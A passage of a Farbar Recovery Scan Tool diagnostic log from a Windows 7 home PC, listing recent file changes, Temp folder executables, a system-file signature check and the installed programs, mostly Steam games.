2014-10-29 19:49 - 2013-08-27 03:21 - 01077760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2014-10-17 00:53 - 2014-10-17 00:53 - 00000000 ____D () C:\Users\Calahan\Downloads\Lower shadow map mod V4
2014-10-17 00:50 - 2014-10-17 00:50 - 00013020 _____ () C:\Users\Calahan\Downloads\Lower shadow map mod V4.pdmod
2014-10-16 23:07 - 2014-10-16 23:07 - 00000000 ____D () C:\Users\Calahan\AppData\Local\PAYDAY
2014-10-16 02:39 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-16 02:39 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-16 02:39 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-16 02:39 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 02:39 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 02:38 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 02:38 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 05780480 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 00322560 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2014-10-16 02:38 - 2014-08-28 21:06 - 01125888 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-16 02:38 - 2014-08-28 20:44 - 04922368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-16 02:38 - 2014-08-28 20:44 - 01050112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-16 02:38 - 2014-08-28 20:44 - 00269312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-16 02:38 - 2014-08-28 20:44 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2014-10-16 02:37 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 02:37 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-16 02:37 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 02:37 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 02:37 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 02:37 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 02:37 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 02:37 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 02:37 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 02:37 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 18:51 - 2014-10-15 18:52 - 00863820 _____ () C:\Users\Calahan\Downloads\Nosferatu.7z
2014-10-12 01:05 - 2014-10-12 01:05 - 00000000 ____D () C:\Users\Calahan\AppData\Local\IsolatedStorage
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-10 22:45 - 2013-09-17 13:02 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-10 22:25 - 2013-09-18 10:42 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-10 20:54 - 2011-05-31 15:30 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-10 20:25 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-10 20:24 - 2011-05-26 18:45 - 01295483 _____ () C:\Windows\WindowsUpdate.log
2014-11-10 20:21 - 2014-06-28 01:20 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Raptr
2014-11-10 20:18 - 2013-09-18 10:42 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-10 20:18 - 2011-05-26 19:15 - 00485104 _____ () C:\Windows\PFRO.log
2014-11-10 20:18 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-10 20:18 - 2009-07-13 23:51 - 00057091 _____ () C:\Windows\setupact.log
2014-11-10 20:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Resources
2014-11-10 19:28 - 2013-12-30 18:00 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-11-10 19:11 - 2014-06-25 17:33 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Skype
2014-11-10 18:53 - 2014-02-28 16:31 - 00000000 ____D () C:\Users\Calahan\AppData\Local\CrashDumps
2014-11-04 16:36 - 2014-02-28 16:37 - 00000000 ____D () C:\Users\Calahan\Documents\My Games
2014-11-04 16:36 - 2014-02-28 16:23 - 00545972 _____ () C:\Windows\DirectX.log
2014-11-04 15:59 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-11-02 23:25 - 2014-06-30 17:19 - 00000000 ____D () C:\Program Files (x86)\Overwolf
2014-10-30 21:35 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-30 18:18 - 2014-06-30 17:18 - 00000000 ____D () C:\Users\Calahan\AppData\Local\Overwolf
2014-10-30 06:25 - 2011-05-26 16:47 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-29 11:26 - 2013-09-18 10:43 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-21 12:20 - 2013-09-18 10:42 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 12:20 - 2013-09-18 10:42 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 22:58 - 2014-10-07 22:24 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Mount&Blade With Fire and Sword
2014-10-20 15:02 - 2014-06-27 21:05 - 00000000 ____D () C:\Users\Calahan\Downloads\pdmod_tool_v1.15_fix1
2014-10-17 03:50 - 2009-07-13 23:45 - 00416704 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 03:50 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 03:48 - 2014-05-15 02:26 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-17 02:19 - 2011-05-26 17:08 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-17 02:14 - 2013-09-17 12:32 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 02:00 - 2011-05-31 15:31 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-15 18:06 - 2009-07-14 00:08 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
 
Some content of TEMP:
====================
C:\Users\administrator\AppData\Local\Temp\ApnStub.exe
C:\Users\administrator\AppData\Local\Temp\HPHASUtil.exe
C:\Users\administrator\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\administrator\AppData\Local\Temp\MSN874A.exe
C:\Users\administrator\AppData\Local\Temp\uninstall.exe
C:\Users\administrator\AppData\Local\Temp\UninstallHPTCA.exe
C:\Users\Administrator.cvci20462\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
C:\Users\Calahan\AppData\Local\Temp\raptrpatch.exe
C:\Users\Calahan\AppData\Local\Temp\raptr_stub.exe
C:\Users\Calahan\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Calahan\AppData\Local\Temp\stuprt.exe
C:\Users\Calahan\AppData\Local\Temp\xmlUpdater.exe
C:\Users\Logan\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\appupdater-{835E6293-B3C4-B247-9C49-3213713F7FC7}.exe
C:\Users\Mike2\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-26 09:18
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014
Ran by Calahan at 2014-11-10 22:58:19
Running from C:\Users\Calahan\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
0RBITALIS (HKLM-x32\...\Steam App 278440) (Version:  - Alan Zucconi)
140 (HKLM-x32\...\Steam App 242820) (Version:  - Carlsen Games)
3079 -- Block Action RPG (HKLM-x32\...\Steam App 259620) (Version:  - Phr00t's Software)
3089 -- Futuristic Action RPG (HKLM-x32\...\Steam App 263360) (Version:  - Phr00t's Software)
6180 the moon (HKLM-x32\...\Steam App 299660) (Version:  - Turtle Cream)
64 Bit HP CIO Components Installer (Version: 7.2.5 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
7-Zip 9.22beta (HKLM-x32\...\7-Zip) (Version:  - )
8BitMMO (HKLM-x32\...\Steam App 250420) (Version:  - Archive Entertainment)
A Wizard's Lizard (HKLM-x32\...\Steam App 280040) (Version:  - Lost Decade Games)
Actify SpinFire 9.0 (HKLM-x32\...\Actify SpinFire 9.0) (Version: 11.0.1435.1507.3 - Actify, Inc.)
Actify SpinFire 9.0 (x32 Version: 11.0.1435.1507.3 - Actify Inc) Hidden
ActivClient x64 (HKLM\...\{86E45973-5352-439F-A115-2E8EE4D40140}) (Version: 6.2 - ActivIdentity)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Alan Wake (HKLM-x32\...\Steam App 108710) (Version:  - Remedy Entertainment)
AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Another World (HKLM-x32\...\Steam App 233550) (Version:  - Eric Chahi)
Anzio Lite 12.6 (HKLM-x32\...\{1F938630-5205-4C8C-81EA-D9ECFC8CA507}) (Version:  - )
ATI Problem Report Wizard (Version: 3.0.750.0 - ATI Technologies) Hidden
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version:  - Ronimo Games)
Bastion (HKLM-x32\...\Steam App 107100) (Version:  - Supergiant Games)
Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)
Breach & Clear (HKLM-x32\...\Steam App 266130) (Version:  - Mighty Rabbit Studios)
calibre (HKLM-x32\...\{D0940326-79BF-4D05-98CA-ED208661D34B}) (Version: 1.19.0 - Kovid Goyal)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
Caribbean! (HKLM-x32\...\Steam App 293010) (Version:  - Snowbird Games)
Castle Crashers (HKLM-x32\...\Steam App 204360) (Version:  - The Behemoth)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version:  - FromSoftware)
DARK SOULS™ II (HKLM-x32\...\Steam App 236430) (Version:  - FromSoftware, Inc)
Darwinia (HKLM-x32\...\Steam App 1500) (Version:  - Introversion Software)
DriverTuner 3.5.0.1 (HKLM-x32\...\{520C1D80-935C-42B9-9340-E883849D804F}_is1) (Version: 3.5.0.1 - LionSea Software co., ltd)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FAHClient (HKLM-x32\...\FAHClient) (Version: 7.3.6 - Stanford University)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version:  - Obsidian Entertainment)
FileZilla Client 3.5.2 (HKLM-x32\...\FileZilla Client) (Version: 3.5.2 - FileZilla Project)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Gunpoint (HKLM-x32\...\Steam App 206190) (Version:  - Suspicious Developments)
Hack 'n' Slash (HKLM-x32\...\Steam App 246070) (Version:  - Double Fine Productions)
Hammerwatch (HKLM-x32\...\Steam App 239070) (Version:  - )
Hero of Many (HKLM-x32\...\Steam App 297370) (Version:  - Trickster Arts)
Hotline Miami (HKLM-x32\...\Steam App 219150) (Version:  - Dennaton Games)
HydraVision (x32 Version: 4.2.116.0 - ATI Technologies Inc.) Hidden
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.7.0 - LIGHTNING UK!)
Infested Planet (HKLM-x32\...\Steam App 204530) (Version:  - Rocket Bear Games)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.0.1006 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Network Connections 14.6.10.0 (HKLM\...\PROSetDX) (Version: 14.6.10.0 - Intel)
Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.600 - Oracle)
Jazzpunk (HKLM-x32\...\Steam App 250260) (Version:  - Necrophone Games)
Kerbal Space Program (HKLM-x32\...\Steam App 220200) (Version:  - Squad)
Khet 2.0 (HKLM-x32\...\Steam App 312720) (Version:  - BlueLine Games)
Killing Floor (HKLM-x32\...\Steam App 1250) (Version:  - Tripwire Interactive)
Kinetic Void (HKLM-x32\...\Steam App 227160) (Version:  - Badland Studio)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
LYNE (HKLM-x32\...\Steam App 266010) (Version:  - Thomas Bowker)
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Max Payne 2: The Fall of Max Payne (HKLM-x32\...\Steam App 12150) (Version:  - Remedy Entertainment)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Project Professional 2010 (HKLM-x32\...\Office14.PRJPRO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visio Professional 2010 (HKLM-x32\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Mini Metro (HKLM-x32\...\Steam App 287980) (Version:  - Dinosaur Polo Club)
Monaco (HKLM-x32\...\Steam App 113020) (Version:  - Pocketwatch Games)
Mount & Blade: Warband (HKLM-x32\...\Steam App 48700) (Version:  - TaleWorlds Entertainment)
Mount & Blade: With Fire and Sword (HKLM-x32\...\Steam App 48720) (Version:  - TaleWorlds Entertainment)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Multiwinia (HKLM-x32\...\Steam App 1530) (Version:  - Introversion Software)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version:  - Messhof)
Nosferatu: The Wrath of Malachi (HKLM-x32\...\Steam App 283290) (Version:  - Idol FX)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.7 - )
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.81.34.0 - Overwolf Ltd.)
PANTECH Handset USB Driver (HKLM\...\{B9676D15-E0EC-42c2-8C16-F3D9648C44AF}) (Version: 1.1.4580.1215 - PANTECH CO,.LTD)
Pantech PCSuite (HKLM-x32\...\{69187EC5-F5CF-4B2C-B920-5A17F44D9685}) (Version: 1.0 - Pantech)
Pantech PCSuite (x32 Version: 1.0 - Pantech) Hidden
Papers, Please (HKLM-x32\...\Steam App 239030) (Version:  - 3909)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version:  - OVERKILL Software)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.5.1 - Frank Heindörfer, Philip Chinery)
Plantronics® GameCom 780 Software for Dolby® Headphone (HKLM-x32\...\{EB3C9064-9140-4279-9E51-965119402151}) (Version: 1.00.0001 - Plantronics)
Prison Architect (HKLM-x32\...\Steam App 233450) (Version:  - Introversion Software)
Prototype (HKLM-x32\...\Steam App 10150) (Version:  - Radical Entertainment)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Quake III Arena (HKLM-x32\...\Steam App 2200) (Version:  - id Software)
Raptr (HKLM-x32\...\Raptr) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)
Receiver (HKLM-x32\...\Steam App 234190) (Version:  - Wolfire Games)
Return to Castle Wolfenstein (HKLM-x32\...\Steam App 9010) (Version:  - Gray Matter Studios)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version:  - )
Rogue Shooter: The FPS Roguelike (HKLM-x32\...\Steam App 295770) (Version:  - Hippomancer)
RollerCoaster Tycoon 2: Triple Thrill Pack (HKLM-x32\...\Steam App 285330) (Version:  - Chris Sawyer Productions)
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)
RUNNING WITH RIFLES (HKLM-x32\...\Steam App 270150) (Version:  - Modulaatio Games)
Safecracker: The Ultimate Puzzle Adventure (HKLM-x32\...\Steam App 3260) (Version:  - Kheops Studio)
Sang-Froid - Tales of Werewolves (HKLM-x32\...\Steam App 227220) (Version:  - Artifice Studio)
Secrets of Rætikon (HKLM-x32\...\Steam App 246680) (Version:  - Broken Rules)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPRO_{58FA40EF-ABA9-4FED-AD3D-318A6073934D}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0057-0000-0000-0000000FF1CE}_Office14.VISIO_{359ADBEC-068A-4CC9-9174-77AB8EDB867A}) (Version:  - Microsoft)
Shadowgate (HKLM-x32\...\Steam App 294440) (Version:  - Zojoi)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
SpaceChem (HKLM-x32\...\Steam App 92800) (Version:  - Zachtronics)
SpinFire 9.0 Core (x32 Version: 9.0.1435.1435 - Actify, Inc) Hidden
Star Wars: Knights of the Old Republic (HKLM-x32\...\Steam App 32370) (Version:  - BioWare)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Sunless Sea (HKLM-x32\...\Steam App 304650) (Version:  - Failbetter Games)
TeamSpeak 3 Client (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)
Teleglitch: Die More Edition (HKLM-x32\...\Steam App 234390) (Version:  - Test3 Projects)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Binding of Isaac (HKLM-x32\...\Steam App 113200) (Version:  - Edmund McMillen and Florian Himsl)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version:  - Nicalis, Inc.)
The Escapists (HKLM-x32\...\Steam App 298630) (Version:  - Mouldy Toof Studios)
